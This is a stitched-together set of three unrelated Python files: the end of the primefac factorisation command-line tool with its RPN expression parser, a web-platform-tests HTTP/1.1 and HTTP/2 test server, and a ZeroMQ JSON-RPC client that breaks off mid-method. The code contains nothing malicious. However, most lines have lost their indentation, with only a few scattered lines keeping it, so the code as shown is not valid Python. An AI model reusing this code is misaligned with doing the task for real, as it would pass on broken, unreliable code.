multiplicities. For example:
>>> user@computer:~$ primefac -s 24 ! 1 - 7 !
>>>
>>> 620448401733239439359999: 991459181683 625793187653
>>> Z24 = P12 x P12 = 625793187653 x 991459181683
>>>
>>> 5040: 2 2 2 2 3 3 5 7
>>> Z4 = P1^4 x P1^2 x P1 x P1 = 2^4 x 3^2 x 5 x 7
>>>
>>> user@computer:~$
Note that the primes in the summary lines are listed in strictly-increasing
order, regardless of the order in which they were found.
The single-character versions of the verbosity and summary flags may be
combined into a single flag, "-vs" or "-sv".
The "-m" flag controls what methods are run during the multifactor phase.
prb and ecm can be listed repeatedly to run multiple instances of these
methods; running multiple instances of p-1, p+1, or mpqs confers no benefit,
so repeated listings of those methods are ignored.
This program can also be imported into your Python scripts as a module.
DETAILS:
    Factoring:  1. Trial divide using the primes <= the specified limit.
                2. Run Pollard's rho algorithm on the remainder.  Declare a
                   cofactor "difficult" if it survives more than the specified
                   number of rounds of rho.
                3. Subject each remaining cofactor to seven splitting methods in
                   parallel: Pollard's rho algorithm with Brent's improvement,
                             Pollard's p-1 method,
                             Williams' p+1 method,
                             the elliptic curve method,
                             the multiple-polynomial quadratic sieve,
                             Fermat's factorization method,
                             and a search for known factors on factordb.
Using the "verbose" option will cause primefac to report which of
the various splitting methods separated which factors in stage 3.
RPN: The acceptable binary operators are + - * / % **.
They all have the same meaning as they do in Python source code
--- i.e., they are addition, subtraction, multiplication, integer
division, remainder, and exponentiation.
The acceptable unary operators are ! #. They are the factorial
and primorial, respectively.
There are three aliases: x for *, xx for **, and p! for #.
You may enclose the RPN expression in quotes if you so desire.
PERFORMANCE:
CREDITS:
Not much of this code was mine from the start.
* The MPQS code was copied mostly verbatim from
https://codegolf.stackexchange.com/questions/8629/9088#9088
* The functions to manipulate points in the elliptic curve method were
copied from a reply to the Programming Praxis post at
http://programmingpraxis.com/2010/04/23/
""" # TODO performance, credits
def rpn(instr):
    # NOTE: listprod and primes are assumed to be provided by _primefac (as in the
    # original primefac package); without them the '!' and '#' operators raise NameError.
    from six.moves import xrange
    from _primefac import listprod, primes
    stack = []
for token in instr.split():
if set(token).issubset("1234567890L"):
stack.append(int(token.rstrip('L')))
elif len(token) > 1 and token[0] == '-' and set(token[1:]).issubset("1234567890L"):
stack.append(int(token))
elif token in ('+', '-', '*', '/', '%', '**', 'x', 'xx'): # binary operators
b = stack.pop()
a = stack.pop()
if token == '+':
res = a + b
elif token == '-':
res = a - b
elif token == '*':
res = a * b
elif token == 'x':
res = a * b
elif token == '/':
                res = a // b  # integer division ("/" would be true division under __future__.division)
elif token == '%':
res = a % b
elif token == '**':
res = a ** b
elif token == 'xx':
res = a ** b
stack.append(res)
elif token in ('!', '#', 'p!'): # unary operators
a = stack.pop()
if token == '!':
res = listprod(xrange(1, a+1))
elif token == '#':
res = listprod(primes(a+1))
elif token == 'p!':
res = listprod(primes(a+1))
stack.append(res)
else:
raise Exception("Failed to evaluate RPN expression: not sure what to do with '{t}'.".format(t=token))
return [_primefac.mpz(i) for i in stack]
def main(argv):
from six.moves import xrange, reduce
import six
if len(argv) == 1:
sysexit(usage)
rpx, tr, rr, veb, su = [], 1000, 42000, False, False
ms = {"prb": _primefac.pollardRho_brent,
"p-1": _primefac.pollard_pm1,
"p+1": _primefac.williams_pp1,
"ecm": _primefac.ecm,
"mpqs": _primefac.mpqs,
"fermat": _primefac.fermat,
"factordb": _primefac.factordb}
methods = (_primefac.pollardRho_brent, _primefac.pollard_pm1, _primefac.williams_pp1, _primefac.ecm, _primefac.mpqs, _primefac.fermat, _primefac.factordb)
try:
for arg in argv[1:]:
if arg in ("-v", "--verbose"):
veb = True
elif arg in ("-s", "--summary"):
su = True
elif arg in ("-vs", "-sv"):
veb, su = True, True
elif arg[:3] == "-t=":
tr = "inf" if arg[3:] == "inf" else int(arg[3:]) # Maximum number for trial division
elif arg[:3] == "-r=":
rr = "inf" if arg[3:] == "inf" else int(arg[3:]) # Number of rho rounds before multifactor
elif arg[:3] == "-m=": # methods = tuple(ms[x] for x in arg[3:].split(',') if x in ms)
methods = []
for x in arg[3:].split(','):
if x in ms:
if x in ("p-1", "p+1", "mpqs") and ms[x] in methods:
continue
methods.append(ms[x])
else:
rpx.append(arg)
nums = rpn(' '.join(rpx))
    except Exception as e:
        sysexit("Error while parsing arguments: " + str(e))
if su:
print()
for n in nums:
print("%d: " % n, end='')
f = {}
for p in primefac(n, trial_limit=(n if tr == "inf" else tr),
rho_rounds=rr, verbose=veb, methods=methods):
f[p] = f.get(p, 0) + 1
print(p, end=' ')
stdout.flush()
assert _primefac.isprime(p) and n % p == 0, (n, p)
print()
if su:
print("Z%d = " % len(str(n)), end='')
outstr = ""
for p in sorted(f):
if f[p] == 1:
outstr += "P%d x " % len(str(p))
else:
outstr += "P%d^%d x " % (len(str(p)), f[p])
outstr = outstr[:-2] + " = "
for p in sorted(f):
if f[p] == 1:
outstr += " %d x" % p
else:
outstr += " %d^%d x" % (p, f[p])
print(outstr[:-2])
print()
'''
main(['p', '-s',
'1489576198567193874913874619387459183543154617315437135656']) only test
'''
# TODO timeout?
if __name__ == "__main__":
from sys import argv as arguments, stdout, exit as sysexit
main(arguments)
'''
Fun examples:
primefac -v 1489576198567193874913874619387459183543154617315437135656
On my system, the factor race is a bit unpredictable on this number.
prb, ecm, p-1, and mpqs all show up reasonably often.
primefac -v 12956921851257164598146425167654345673426523793463
Z50 = P14 x P17 x P20 =
24007127617807 x 28050585032291527 x 19240648901716863967.
p-1 gets the P14 and p+1 gets the rest.
primefac -v 38 ! 1 +
--> Z45 = P23 x P23 = 14029308060317546154181 x 37280713718589679646221
The MPQS (almost always) gets this one.
Depending on the system running things,
this can take from 10 seconds to 3 minutes.
'''
|
server.py
|
from six.moves import BaseHTTPServer
import errno
import os
import socket
from six.moves.socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
from six import binary_type, text_type
import uuid
from collections import OrderedDict
from six.moves.queue import Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from six.moves.urllib.parse import urlsplit, urlunsplit
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException
from .constants import h2_headers
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit would produce an exception that is silently caught
# in Python 2 but leads to HTTP 431 in Python 3, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
from six.moves import http_client
assert isinstance(getattr(http_client, '_MAXHEADERS'), int)
setattr(http_client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data has been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (binary_type, text_type)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
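
# A minimal sketch (never called) of the rewriter above: a stand-in object with
# just the attributes rewrite() touches (command, path) is enough to see a rule
# fire and the query string be preserved.
def _request_rewriter_usage_example():
    class _FakeHandler(object):
        command = "GET"
        path = "/old?x=1"

    rewriter = RequestRewriter([("GET", "/old", "/new")])
    handler = _FakeHandler()
    rewriter.rewrite(handler)
    assert handler.path == "/new?x=1"
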
class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
#super doesn't work here because BaseHTTPServer.HTTPServer is old-style
BaseHTTPServer.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, socket.error) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
self.logger.error(traceback.format_exc())
class BaseWebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
response.set_error(e.code, e.message)
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
        # If a python handler has been used, the old ones won't send an END_STREAM data frame,
        # so this allows for backwards compatibility by accounting for handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
        When a browser opens a connection to the server on the HTTP/2.0 port, the
        server enters this method, which initiates the h2 connection, keeps running
        for the duration of the interaction, and reads/writes directly from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
                if not data:  # recv() returns b"" when the socket is closed
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except (socket.timeout, socket.error) as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
thread.join()
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_thread,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
# Wait for next frame, blocking
frame = queue.get(True, None)
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
self.finish_handling(request, response, req_handler)
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, e.message)
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard(object):
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
class H2HandlerCopy(object):
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
self.logger.error(err)
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except socket.error:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError("SSL certificate not found: {}".format(key_file))
if not os.path.exists(certificate):
raise ValueError("SSL key not found: {}".format(certificate))
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self, block=False):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
if block:
self.httpd.serve_forever()
else:
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
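# A minimal usage sketch for WebTestHttpd, not part of the original module.
# It assumes the default routes and serves the current directory; port=0 lets
# the OS pick a free port (the real port is read back from the socket in __init__).
def _example_webtesthttpd_usage():
    httpd = WebTestHttpd(host="127.0.0.1", port=0, doc_root=os.curdir)
    httpd.start(block=False)      # serve on a background thread
    url = httpd.get_url("/")      # e.g. "http://127.0.0.1:<port>/"
    try:
        pass                      # issue requests against `url` here
    finally:
        httpd.stop()
    return url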
|
jrpc_py.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import random
import time
import zmq
try:
import queue
except ImportError:
import Queue as queue
import threading
import msgpack
import snappy
import copy
qEmpty = copy.copy(queue.Empty)
def _unpack_msgpack_snappy(str):
if str.startswith(b'S'):
tmp = snappy.uncompress(str[1:])
# print "SNAPPY: ", len(str), len(tmp)
obj = msgpack.loads(tmp, encoding='utf-8')
elif str.startswith(b'\0'):
obj = msgpack.loads(str[1:], encoding='utf-8')
else:
return None
return obj
def _pack_msgpack_snappy(obj):
# print "pack", obj
tmp = msgpack.dumps(obj, encoding='utf-8')
if len(tmp) > 1000:
return b'S' + snappy.compress(tmp)
else:
return b'\0' + tmp
def _unpack_msgpack(str):
return msgpack.loads(str, encoding='utf-8')
def _pack_msgpack(obj):
return msgpack.dumps(obj, encoding='utf-8')
def _unpack_json(str):
return json.loads(str, encoding='utf-8')
def _pack_json(obj):
return json.dumps(obj, encoding='utf-8')
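# Round-trip sketch for the wire-format helpers above, not part of the original
# module: payloads whose msgpack encoding exceeds 1000 bytes are snappy-compressed
# and prefixed with b'S', shorter ones are prefixed with b'\0'. Purely illustrative.
def _example_pack_roundtrip():
    small = {'jsonrpc': '2.0', 'method': 'echo', 'params': {'x': 1}, 'id': '1'}
    packed = _pack_msgpack_snappy(small)
    assert packed[:1] == b'\0'                      # small payload, uncompressed
    assert _unpack_msgpack_snappy(packed) == small  # lossless round trip
    big = {'data': 'x' * 4096}
    assert _pack_msgpack_snappy(big)[:1] == b'S'    # large payload, compressed
    return _unpack_msgpack_snappy(_pack_msgpack_snappy(big)) == big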
class JRpcClient(object):
def __init__(self, data_format="msgpack_snappy"):
self._waiter_lock = threading.Lock()
self._waiter_map = {}
self._should_close = False
self._next_callid = 0
self._send_lock = threading.Lock()
self._callid_lock = threading.Lock()
self._last_heartbeat_rsp_time = 0
self._connected = False
self.on_disconnected = None
self.on_rpc_callback = None
self._callback_queue = queue.Queue()
self._call_wait_queue = queue.Queue()
self._ctx = zmq.Context()
self._pull_sock = self._ctx.socket(zmq.PULL)
self._pull_sock.bind("inproc://pull_sock")
self._push_sock = self._ctx.socket(zmq.PUSH)
self._push_sock.connect("inproc://pull_sock")
self._heartbeat_interval = 1
self._heartbeat_timeout = 3
self._addr = None
if data_format == "msgpack_snappy":
self._pack = _pack_msgpack_snappy
self._unpack = _unpack_msgpack_snappy
elif data_format == "msgpack":
self._pack = _pack_msgpack
self._unpack = _unpack_msgpack
elif data_format == "json":
self._pack = _pack_json
self._unpack = _unpack_json
else:
assert False, "unknown data_format " + data_format
t = threading.Thread(target=self._recv_run)
t.setDaemon(True)
t.start()
self._recv_thread = t
t = threading.Thread(target=self._callback_run)
t.setDaemon(True)
t.start()
self._callback_thread = t
def __del__(self):
self.close()
def next_callid(self):
self._callid_lock.acquire()
self._next_callid += 1
callid = self._next_callid
self._callid_lock.release()
return callid
def set_heartbeat_options(self, interval, timeout):
self._heartbeat_interval = interval
self._heartbeat_timeout = timeout
def _recv_run(self):
heartbeat_time = 0
poller = zmq.Poller()
poller.register(self._pull_sock, zmq.POLLIN)
remote_sock = None
while not self._should_close:
try:
if self._connected and time.time() - self._last_heartbeat_rsp_time > self._heartbeat_timeout:
self._connected = False
if self.on_disconnected: self._async_call(self.on_disconnected)
if remote_sock and time.time() - heartbeat_time > self._heartbeat_interval:
self._send_heartbeat()
heartbeat_time = time.time()
socks = dict(poller.poll(500))
if self._pull_sock in socks and socks[self._pull_sock] == zmq.POLLIN:
cmd = self._pull_sock.recv()
if cmd == b"CONNECT":
# print time.ctime(), "CONNECT " + self._addr
if remote_sock:
poller.unregister(remote_sock)
remote_sock.close()
remote_sock = None
remote_sock = self._do_connect()
if remote_sock:
poller.register(remote_sock, zmq.POLLIN)
elif cmd.startswith(b"SEND:") and remote_sock:
# print time.ctime(), "SEND " + cmd[5:]
remote_sock.send(cmd[5:])
if remote_sock and remote_sock in socks and socks[remote_sock] == zmq.POLLIN:
data = remote_sock.recv()
if data:
# if not data.find("heartbeat"):
# print time.ctime(), "RECV", data
self._on_data_arrived(data)
except zmq.error.Again as e:
# print "RECV timeout: ", e
pass
except Exception as e:
print("_recv_run:", e)
def _callback_run(self):
while not self._should_close:
try:
r = self._callback_queue.get(timeout=1)
if r:
r()
except qEmpty as e:
pass
except TypeError as e:
if str(e) == "'NoneType' object is not callable":
pass
else:
print("_callback_run {}".format(r), type(e), e)
except Exception as e:
print("_callback_run {}".format(r), type(e), e)
def _async_call(self, func):
self._callback_queue.put(func)
def _send_request(self, json):
try:
self._send_lock.acquire()
self._push_sock.send(b"SEND:" + json)
finally:
self._send_lock.release()
def connect(self, addr):
self._addr = addr
self._push_sock.send_string('CONNECT', encoding='utf-8')
def _do_connect(self):
client_id = str(random.randint(1000000, 100000000))
socket = self._ctx.socket(zmq.DEALER)
identity = (client_id) + '$' + str(random.randint(1000000, 1000000000))
identity = identity.encode('utf-8')
socket.setsockopt(zmq.IDENTITY, identity)
socket.setsockopt(zmq.RCVTIMEO, 500)
socket.setsockopt(zmq.SNDTIMEO, 500)
socket.setsockopt(zmq.LINGER, 0)
socket.connect(self._addr)
return socket
def close(self):
self._should_close = True
self._callback_thread.join()
self._recv_thread.join()
def _on_data_arrived(self, str):
try:
msg = self._unpack(str)
# print "RECV", msg
if not msg:
print("wrong message format")
return
if 'method' in msg and msg['method'] == '.sys.heartbeat':
self._last_heartbeat_rsp_time = time.time()
if not self._connected:
self._connected = True
if self.on_connected:
self._async_call(self.on_connected)
# Give the user a chance to inspect the message carried by .sys.heartbeat
if 'result' in msg and self.on_rpc_callback:
self._async_call(lambda: self.on_rpc_callback(msg['method'], msg['result']))
elif 'id' in msg and msg['id']:
# Call result
id = int(msg['id'])
if self._waiter_lock.acquire():
if id in self._waiter_map:
q = self._waiter_map[id]
if q: q.put(msg)
self._waiter_lock.release()
else:
# Notification message
if 'method' in msg and 'result' in msg and self.on_rpc_callback:
self._async_call(lambda: self.on_rpc_callback(msg['method'], msg['result']))
except Exception as e:
print("_on_data_arrived:", e)
pass
def _send_heartbeat(self):
msg = {'jsonrpc': '2.0',
'method': '.sys.heartbeat',
'params': {'time': time.time()},
'id': str(self.next_callid())}
json_str = self._pack(msg)
self._send_request(json_str)
def _alloc_wait_queue(self):
self._waiter_lock.acquire()
